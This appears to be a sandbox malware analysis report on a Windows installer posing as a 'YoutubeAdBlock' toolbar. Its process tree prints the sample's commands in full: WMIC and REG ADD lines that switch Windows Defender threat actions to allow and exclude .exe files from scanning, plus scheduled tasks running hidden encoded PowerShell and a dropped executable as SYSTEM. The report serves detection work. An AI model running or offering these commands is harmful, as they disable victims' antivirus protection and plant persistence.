Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{601F87D8-13CD-4AEA-83DA-960D9654B38D}\ProxyStubClsid32	oBRwDtw.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{FB291A6A-0C06-4AC8-A4EF-C56051B9DBFE}\1.0\0\win32	oBRwDtw.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1A4355C3-1380-4565-8F0B-AE992134C31B}	oBRwDtw.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1A4355C3-1380-4565-8F0B-AE992134C31B}\ProgID = "Toolbar.ExtensionHelperObject.1"	oBRwDtw.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{34B9BF3D-82C3-4751-AC73-F5B1CE3A5956}\1.0\0\win32\ = "C:\\Program Files (x86)\\WSPNEpLqQIE\\xmNhbyV.exe"	oBRwDtw.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0A295B43-A0FB-45C6-9F08-7A7D2FCCA175}\ProxyStubClsid32\ = "{00020420-0000-0000-C000-000000000046}"	oBRwDtw.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{69B17FBB-AC1E-4F2F-A486-D6A4606A6C36}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	oBRwDtw.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1A4355C3-1380-4565-8F0B-AE992134C31B}	oBRwDtw.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{FA7B2EB3-B9D9-4CF7-9525-78D069C142B7}\Programmable	oBRwDtw.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{FA7B2EB3-B9D9-4CF7-9525-78D069C142B7}\LocalServer32	oBRwDtw.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{FB291A6A-0C06-4AC8-A4EF-C56051B9DBFE}\1.0\0	oBRwDtw.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1A4355C3-1380-4565-8F0B-AE992134C31B}\Programmable	oBRwDtw.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1A4355C3-1380-4565-8F0B-AE992134C31B}\Implemented Categories\{59FB2056-D625-48D0-A944-1A85B5AB2640}\	oBRwDtw.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{601F87D8-13CD-4AEA-83DA-960D9654B38D}\ProxyStubClsid32	oBRwDtw.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1A4355C3-1380-4565-8F0B-AE992134C31B}\ = "YoutubeAdBlock"	oBRwDtw.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{601F87D8-13CD-4AEA-83DA-960D9654B38D}\TypeLib\Version = "1.0"	oBRwDtw.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{69B17FBB-AC1E-4F2F-A486-D6A4606A6C36}\TypeLib\ = "{34B9BF3D-82C3-4751-AC73-F5B1CE3A5956}"	oBRwDtw.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1A4355C3-1380-4565-8F0B-AE992134C31B}\Programmable	oBRwDtw.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1A4355C3-1380-4565-8F0B-AE992134C31B}\InprocServer32	oBRwDtw.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{601F87D8-13CD-4AEA-83DA-960D9654B38D}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	oBRwDtw.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{FB291A6A-0C06-4AC8-A4EF-C56051B9DBFE}\1.0\0\win32\ = "C:\\Program Files (x86)\\WSPNEpLqQIE\\ktTXGKPDP.dll"	oBRwDtw.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1A4355C3-1380-4565-8F0B-AE992134C31B}\InprocServer32\ThreadingModel = "Apartment"	oBRwDtw.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{34B9BF3D-82C3-4751-AC73-F5B1CE3A5956}\1.0\0	oBRwDtw.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0A295B43-A0FB-45C6-9F08-7A7D2FCCA175}\TypeLib\Version = "1.0"	oBRwDtw.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0A295B43-A0FB-45C6-9F08-7A7D2FCCA175}\ = "_YtazTUhZpmGFMeosxGoStrqXzW"	oBRwDtw.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{69B17FBB-AC1E-4F2F-A486-D6A4606A6C36}\TypeLib\ = "{34B9BF3D-82C3-4751-AC73-F5B1CE3A5956}"	oBRwDtw.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1A4355C3-1380-4565-8F0B-AE992134C31B}\Implemented Categories\{59FB2056-D625-48D0-A944-1A85B5AB2640}	oBRwDtw.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1A4355C3-1380-4565-8F0B-AE992134C31B}\Implemented Categories\{59FB2056-D625-48D0-A944-1A85B5AB2640}\	oBRwDtw.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1A4355C3-1380-4565-8F0B-AE992134C31B}\InprocServer32\ThreadingModel = "Apartment"	oBRwDtw.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{601F87D8-13CD-4AEA-83DA-960D9654B38D}\ = "{601F87D8-13CD-4AEA-83DA-960D9654B38D}"	oBRwDtw.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{FA7B2EB3-B9D9-4CF7-9525-78D069C142B7}\Programmable\	oBRwDtw.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{0A295B43-A0FB-45C6-9F08-7A7D2FCCA175}\TypeLib\ = "{34B9BF3D-82C3-4751-AC73-F5B1CE3A5956}"	oBRwDtw.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{601F87D8-13CD-4AEA-83DA-960D9654B38D}\ProxyStubClsid	oBRwDtw.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{FB291A6A-0C06-4AC8-A4EF-C56051B9DBFE}\1.0\HELPDIR	oBRwDtw.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{601F87D8-13CD-4AEA-83DA-960D9654B38D}\ = "{601F87D8-13CD-4AEA-83DA-960D9654B38D}"	oBRwDtw.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1A4355C3-1380-4565-8F0B-AE992134C31B}\Programmable\	oBRwDtw.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{FB291A6A-0C06-4AC8-A4EF-C56051B9DBFE}\1.0\FLAGS\ = "0"	oBRwDtw.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{601F87D8-13CD-4AEA-83DA-960D9654B38D}	oBRwDtw.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{0A295B43-A0FB-45C6-9F08-7A7D2FCCA175}\ProxyStubClsid32\ = "{00020420-0000-0000-C000-000000000046}"	oBRwDtw.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{69B17FBB-AC1E-4F2F-A486-D6A4606A6C36}\ = "IyFOGQOPsSrjKINQhDMF"	oBRwDtw.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1A4355C3-1380-4565-8F0B-AE992134C31B}\Programmable\	oBRwDtw.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{FB291A6A-0C06-4AC8-A4EF-C56051B9DBFE}\1.0\0\win32\ = "C:\\Program Files (x86)\\WSPNEpLqQIE\\tgZBuA7n.dll"	oBRwDtw.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{FA7B2EB3-B9D9-4CF7-9525-78D069C142B7}\LocalServer32\ = "C:\\Program Files (x86)\\WSPNEpLqQIE\\xmNhbyV.exe"	oBRwDtw.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{34B9BF3D-82C3-4751-AC73-F5B1CE3A5956}\1.0	oBRwDtw.exe

Suspicious behavior: EnumeratesProcesses 44 IoCs

Processes:

powershell.exepowershell.EXEpowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.EXEpowershell.exepowershell.exepowershell.exeoBRwDtw.exepowershell.exepowershell.exepowershell.exe

pid	process
1040	powershell.exe
1040	powershell.exe
1512	powershell.EXE
1596	powershell.exe
1596	powershell.exe
1772	powershell.exe
1772	powershell.exe
1312	powershell.exe
1312	powershell.exe
1716	powershell.exe
1716	powershell.exe
944	powershell.exe
944	powershell.exe
552	powershell.EXE
1704	powershell.exe
1704	powershell.exe
1344	powershell.exe
1344	powershell.exe
1552	powershell.exe
1552	powershell.exe
1848	oBRwDtw.exe
1848	oBRwDtw.exe
1848	oBRwDtw.exe
1848	oBRwDtw.exe
1848	oBRwDtw.exe
1848	oBRwDtw.exe
1848	oBRwDtw.exe
1848	oBRwDtw.exe
1848	oBRwDtw.exe
1848	oBRwDtw.exe
1848	oBRwDtw.exe
1848	oBRwDtw.exe
1848	oBRwDtw.exe
1848	oBRwDtw.exe
1848	oBRwDtw.exe
1848	oBRwDtw.exe
1848	oBRwDtw.exe
920	powershell.exe
920	powershell.exe
1968	powershell.exe
1968	powershell.exe
1060	powershell.exe
1060	powershell.exe
1848	oBRwDtw.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exeWMIC.exepowershell.EXEpowershell.exeWMIC.exepowershell.exeWMIC.exe

description	pid	process
Token: SeDebugPrivilege	1040	powershell.exe
Token: SeIncreaseQuotaPrivilege	940	WMIC.exe
Token: SeSecurityPrivilege	940	WMIC.exe
Token: SeTakeOwnershipPrivilege	940	WMIC.exe
Token: SeLoadDriverPrivilege	940	WMIC.exe
Token: SeSystemProfilePrivilege	940	WMIC.exe
Token: SeSystemtimePrivilege	940	WMIC.exe
Token: SeProfSingleProcessPrivilege	940	WMIC.exe
Token: SeIncBasePriorityPrivilege	940	WMIC.exe
Token: SeCreatePagefilePrivilege	940	WMIC.exe
Token: SeBackupPrivilege	940	WMIC.exe
Token: SeRestorePrivilege	940	WMIC.exe
Token: SeShutdownPrivilege	940	WMIC.exe
Token: SeDebugPrivilege	940	WMIC.exe
Token: SeSystemEnvironmentPrivilege	940	WMIC.exe
Token: SeRemoteShutdownPrivilege	940	WMIC.exe
Token: SeUndockPrivilege	940	WMIC.exe
Token: SeManageVolumePrivilege	940	WMIC.exe
Token: 33	940	WMIC.exe
Token: 34	940	WMIC.exe
Token: 35	940	WMIC.exe
Token: SeDebugPrivilege	1512	powershell.EXE
Token: SeDebugPrivilege	1596	powershell.exe
Token: SeIncreaseQuotaPrivilege	1328	WMIC.exe
Token: SeSecurityPrivilege	1328	WMIC.exe
Token: SeTakeOwnershipPrivilege	1328	WMIC.exe
Token: SeLoadDriverPrivilege	1328	WMIC.exe
Token: SeSystemProfilePrivilege	1328	WMIC.exe
Token: SeSystemtimePrivilege	1328	WMIC.exe
Token: SeProfSingleProcessPrivilege	1328	WMIC.exe
Token: SeIncBasePriorityPrivilege	1328	WMIC.exe
Token: SeCreatePagefilePrivilege	1328	WMIC.exe
Token: SeBackupPrivilege	1328	WMIC.exe
Token: SeRestorePrivilege	1328	WMIC.exe
Token: SeShutdownPrivilege	1328	WMIC.exe
Token: SeDebugPrivilege	1328	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1328	WMIC.exe
Token: SeRemoteShutdownPrivilege	1328	WMIC.exe
Token: SeUndockPrivilege	1328	WMIC.exe
Token: SeManageVolumePrivilege	1328	WMIC.exe
Token: 33	1328	WMIC.exe
Token: 34	1328	WMIC.exe
Token: 35	1328	WMIC.exe
Token: SeDebugPrivilege	1772	powershell.exe
Token: SeIncreaseQuotaPrivilege	604	WMIC.exe
Token: SeSecurityPrivilege	604	WMIC.exe
Token: SeTakeOwnershipPrivilege	604	WMIC.exe
Token: SeLoadDriverPrivilege	604	WMIC.exe
Token: SeSystemProfilePrivilege	604	WMIC.exe
Token: SeSystemtimePrivilege	604	WMIC.exe
Token: SeProfSingleProcessPrivilege	604	WMIC.exe
Token: SeIncBasePriorityPrivilege	604	WMIC.exe
Token: SeCreatePagefilePrivilege	604	WMIC.exe
Token: SeBackupPrivilege	604	WMIC.exe
Token: SeRestorePrivilege	604	WMIC.exe
Token: SeShutdownPrivilege	604	WMIC.exe
Token: SeDebugPrivilege	604	WMIC.exe
Token: SeSystemEnvironmentPrivilege	604	WMIC.exe
Token: SeRemoteShutdownPrivilege	604	WMIC.exe
Token: SeUndockPrivilege	604	WMIC.exe
Token: SeManageVolumePrivilege	604	WMIC.exe
Token: 33	604	WMIC.exe
Token: 34	604	WMIC.exe
Token: 35	604	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

5bda03599e20fd2226c14ad3f22a518b.exeSimplInst.exeSimplInst.execmd.exeforfiles.execmd.exeforfiles.execmd.exe

description	pid	process	target process
PID 816 wrote to memory of 1700	816	5bda03599e20fd2226c14ad3f22a518b.exe	SimplInst.exe
PID 816 wrote to memory of 1700	816	5bda03599e20fd2226c14ad3f22a518b.exe	SimplInst.exe
PID 816 wrote to memory of 1700	816	5bda03599e20fd2226c14ad3f22a518b.exe	SimplInst.exe
PID 816 wrote to memory of 1700	816	5bda03599e20fd2226c14ad3f22a518b.exe	SimplInst.exe
PID 816 wrote to memory of 1700	816	5bda03599e20fd2226c14ad3f22a518b.exe	SimplInst.exe
PID 816 wrote to memory of 1700	816	5bda03599e20fd2226c14ad3f22a518b.exe	SimplInst.exe
PID 816 wrote to memory of 1700	816	5bda03599e20fd2226c14ad3f22a518b.exe	SimplInst.exe
PID 1700 wrote to memory of 792	1700	SimplInst.exe	SimplInst.exe
PID 1700 wrote to memory of 792	1700	SimplInst.exe	SimplInst.exe
PID 1700 wrote to memory of 792	1700	SimplInst.exe	SimplInst.exe
PID 1700 wrote to memory of 792	1700	SimplInst.exe	SimplInst.exe
PID 1700 wrote to memory of 792	1700	SimplInst.exe	SimplInst.exe
PID 1700 wrote to memory of 792	1700	SimplInst.exe	SimplInst.exe
PID 1700 wrote to memory of 792	1700	SimplInst.exe	SimplInst.exe
PID 792 wrote to memory of 544	792	SimplInst.exe	cmd.exe
PID 792 wrote to memory of 544	792	SimplInst.exe	cmd.exe
PID 792 wrote to memory of 544	792	SimplInst.exe	cmd.exe
PID 792 wrote to memory of 544	792	SimplInst.exe	cmd.exe
PID 792 wrote to memory of 544	792	SimplInst.exe	cmd.exe
PID 792 wrote to memory of 544	792	SimplInst.exe	cmd.exe
PID 792 wrote to memory of 544	792	SimplInst.exe	cmd.exe
PID 544 wrote to memory of 1300	544	cmd.exe	forfiles.exe
PID 544 wrote to memory of 1300	544	cmd.exe	forfiles.exe
PID 544 wrote to memory of 1300	544	cmd.exe	forfiles.exe
PID 544 wrote to memory of 1300	544	cmd.exe	forfiles.exe
PID 544 wrote to memory of 1300	544	cmd.exe	forfiles.exe
PID 544 wrote to memory of 1300	544	cmd.exe	forfiles.exe
PID 544 wrote to memory of 1300	544	cmd.exe	forfiles.exe
PID 1300 wrote to memory of 1676	1300	forfiles.exe	cmd.exe
PID 1300 wrote to memory of 1676	1300	forfiles.exe	cmd.exe
PID 1300 wrote to memory of 1676	1300	forfiles.exe	cmd.exe
PID 1300 wrote to memory of 1676	1300	forfiles.exe	cmd.exe
PID 1300 wrote to memory of 1676	1300	forfiles.exe	cmd.exe
PID 1300 wrote to memory of 1676	1300	forfiles.exe	cmd.exe
PID 1300 wrote to memory of 1676	1300	forfiles.exe	cmd.exe
PID 1676 wrote to memory of 1040	1676	cmd.exe	powershell.exe
PID 1676 wrote to memory of 1040	1676	cmd.exe	powershell.exe
PID 1676 wrote to memory of 1040	1676	cmd.exe	powershell.exe
PID 1676 wrote to memory of 1040	1676	cmd.exe	powershell.exe
PID 1676 wrote to memory of 1040	1676	cmd.exe	powershell.exe
PID 1676 wrote to memory of 1040	1676	cmd.exe	powershell.exe
PID 1676 wrote to memory of 1040	1676	cmd.exe	powershell.exe
PID 792 wrote to memory of 1476	792	SimplInst.exe	forfiles.exe
PID 792 wrote to memory of 1476	792	SimplInst.exe	forfiles.exe
PID 792 wrote to memory of 1476	792	SimplInst.exe	forfiles.exe
PID 792 wrote to memory of 1476	792	SimplInst.exe	forfiles.exe
PID 792 wrote to memory of 1476	792	SimplInst.exe	forfiles.exe
PID 792 wrote to memory of 1476	792	SimplInst.exe	forfiles.exe
PID 792 wrote to memory of 1476	792	SimplInst.exe	forfiles.exe
PID 1476 wrote to memory of 1204	1476	forfiles.exe	cmd.exe
PID 1476 wrote to memory of 1204	1476	forfiles.exe	cmd.exe
PID 1476 wrote to memory of 1204	1476	forfiles.exe	cmd.exe
PID 1476 wrote to memory of 1204	1476	forfiles.exe	cmd.exe
PID 1476 wrote to memory of 1204	1476	forfiles.exe	cmd.exe
PID 1476 wrote to memory of 1204	1476	forfiles.exe	cmd.exe
PID 1476 wrote to memory of 1204	1476	forfiles.exe	cmd.exe
PID 1204 wrote to memory of 1824	1204	cmd.exe	reg.exe
PID 1204 wrote to memory of 1824	1204	cmd.exe	reg.exe
PID 1204 wrote to memory of 1824	1204	cmd.exe	reg.exe
PID 1204 wrote to memory of 1824	1204	cmd.exe	reg.exe
PID 1204 wrote to memory of 1824	1204	cmd.exe	reg.exe
PID 1204 wrote to memory of 1824	1204	cmd.exe	reg.exe
PID 1204 wrote to memory of 1824	1204	cmd.exe	reg.exe
PID 1204 wrote to memory of 684	1204	cmd.exe	reg.exe

C:\Users\Admin\AppData\Local\Temp\5bda03599e20fd2226c14ad3f22a518b.exe
"C:\Users\Admin\AppData\Local\Temp\5bda03599e20fd2226c14ad3f22a518b.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:816

C:\Users\Admin\AppData\Local\Temp\7zS23A7.tmp\SimplInst.exe
.\SimplInst.exe
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1700

C:\Users\Admin\AppData\Local\Temp\7zS2607.tmp\SimplInst.exe
.\SimplInst.exe /S /site_id=767
3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Loads dropped DLL
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:792

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" &
4⤵
- Suspicious use of WriteProcessMemory
PID:544

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"
5⤵
- Suspicious use of WriteProcessMemory
PID:1300

C:\Windows\SysWOW64\cmd.exe
/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
6⤵
- Suspicious use of WriteProcessMemory
PID:1676

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
7⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1040

C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
8⤵
- Suspicious use of AdjustPrivilegeToken
PID:940

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True"
5⤵
PID:1520

C:\Windows\SysWOW64\cmd.exe
/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
6⤵
PID:292

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
7⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1596

C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
8⤵
- Suspicious use of AdjustPrivilegeToken
PID:1328

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True"
5⤵
PID:1284

C:\Windows\SysWOW64\cmd.exe
/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
6⤵
PID:1476

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
7⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1772

C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
8⤵
- Suspicious use of AdjustPrivilegeToken
PID:604

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
4⤵
- Suspicious use of WriteProcessMemory
PID:1476

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
5⤵
- Suspicious use of WriteProcessMemory
PID:1204

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
6⤵
PID:1824

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
6⤵
PID:684

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gpiUNEfVN" /SC once /ST 00:14:57 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
4⤵
- Creates scheduled task(s)
PID:1168

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gpiUNEfVN"
4⤵
PID:920

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gpiUNEfVN"
4⤵
PID:1744

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "bqZkKdgiyjBiVwZYfn" /SC once /ST 09:03:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\HIvtarFlYqBBYrrFi\mMKUVlbKUxrhtsQ\YlqWVPE.exe\" nv /site_id 767 /S" /V1 /F
4⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1012

C:\Windows\system32\taskeng.exe
taskeng.exe {9B783932-07AF-4405-B60C-1A415D23FFB0} S-1-5-21-2455352368-1077083310-2879168483-1000:QWOCTUPM\Admin:Interactive:[1]
1⤵
PID:1268

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1512

C:\Windows\system32\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
3⤵
PID:1792

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
PID:552

C:\Windows\system32\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
3⤵
PID:1324

C:\Users\Admin\AppData\Local\Temp\HIvtarFlYqBBYrrFi\JuayFnhb\GEVAcGY.exe
C:\Users\Admin\AppData\Local\Temp\HIvtarFlYqBBYrrFi\JuayFnhb\GEVAcGY.exe en /S
2⤵
- Executes dropped EXE
- Modifies Internet Explorer settings
PID:1748

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" &
3⤵
PID:1168

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"
4⤵
PID:956

C:\Windows\SysWOW64\cmd.exe
